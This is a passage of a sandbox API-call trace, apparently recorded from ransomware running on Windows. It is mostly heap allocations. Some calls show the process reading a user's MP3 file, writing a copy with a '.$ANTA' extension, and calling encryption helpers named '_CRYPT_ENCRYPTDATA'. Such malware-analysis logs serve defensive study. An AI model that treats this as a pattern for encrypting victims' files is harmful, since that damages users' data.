returned 1 [0118.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0118.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0118.112] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0118.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0118.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0118.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0118.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0118.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0118.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0118.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0118.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0118.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0118.112] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0118.112] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0118.112] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0118.112] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0118.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0118.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0118.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0118.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0118.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0118.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0118.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0118.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0118.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0118.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0118.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0118.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0118.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0118.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0118.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0118.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0118.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0118.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0118.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0118.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0118.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0118.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0118.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0118.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0118.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0118.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0118.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0118.113] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a46a0 [0118.113] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0118.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0118.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0118.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0118.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a46a0 | out: hHeap=0x1780000) returned 1 [0118.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0118.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0118.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0118.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0118.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0118.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0118.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0118.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0118.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0118.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0118.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0118.114] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\tG2O\\" (normalized: "c:\\users\\fd1hvy\\music\\tg2o")) returned 0x10 [0118.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0118.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0118.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0118.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0118.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0118.114] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0118.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0118.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0118.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0118.114] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0118.114] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\tG2O\\vgfSxUhhzUZpNrrLJ3hR.mp3.$ANTA" (normalized: "c:\\users\\fd1hvy\\music\\tg2o\\vgfsxuhhzuzpnrrlj3hr.mp3.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0118.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0118.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0118.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0118.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0118.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0118.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0118.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0118.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0118.115] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0118.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0118.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0118.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0118.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0118.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0118.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0118.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0118.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0118.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0118.115] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0118.115] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0118.115] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0118.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0118.115] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0118.115] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0118.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0118.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0118.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0118.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0118.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0118.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0118.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0118.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0118.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0118.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0118.116] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0118.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0118.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0118.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0118.116] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e05020 [0118.119] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0118.119] ReadFile (in: hFile=0x298, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ecd0*=0xee2a, lpOverlapped=0x0) returned 1 [0118.121] ReadFile (in: hFile=0x298, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0118.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0118.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0118.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0118.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0118.121] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xee2a) returned 0x4516010 [0118.121] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e05020 | out: hHeap=0x1780000) returned 1 [0118.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0118.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0118.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0118.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0118.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0118.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xee2a) returned 0x4524e48 [0118.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0118.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0118.124] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0118.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0118.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0118.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0118.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0118.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0118.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xee2a) returned 0x4516010 [0118.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0118.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0118.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0118.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0118.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0118.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0118.124] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0118.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0118.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0118.124] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0118.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0118.124] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0118.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0118.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0118.125] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0118.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0118.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0118.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c78 [0118.125] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0118.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c78 | out: hHeap=0x1780000) returned 1 [0118.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0118.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0118.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2660 [0118.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0118.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0118.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0118.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0118.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xee2a) returned 0x4516010 [0118.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0118.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2590 [0118.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0118.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0118.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0118.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2690 [0118.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0118.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0118.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0118.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25b0 [0118.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0118.125] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0118.125] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0118.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca610 [0118.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0118.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0118.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0118.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0118.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0118.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xee2a) returned 0x4533c80 [0118.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0118.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0118.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0118.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0118.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0118.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0118.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0118.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0118.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0118.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0118.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0118.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0118.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0118.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0118.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0118.126] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0118.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0118.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0118.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0118.126] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0118.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0118.126] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0118.126] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0118.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0118.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0118.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0118.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0118.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0118.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0118.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0118.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0118.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0118.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0118.127] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0118.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0118.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0118.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0118.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2610 [0118.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0118.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0118.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0118.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0118.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca700 [0118.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0118.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0118.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0118.127] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0118.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0118.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0118.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0118.127] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0118.127] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0118.128] RtlAllocateHeap (HeapHandle=0x1780000, 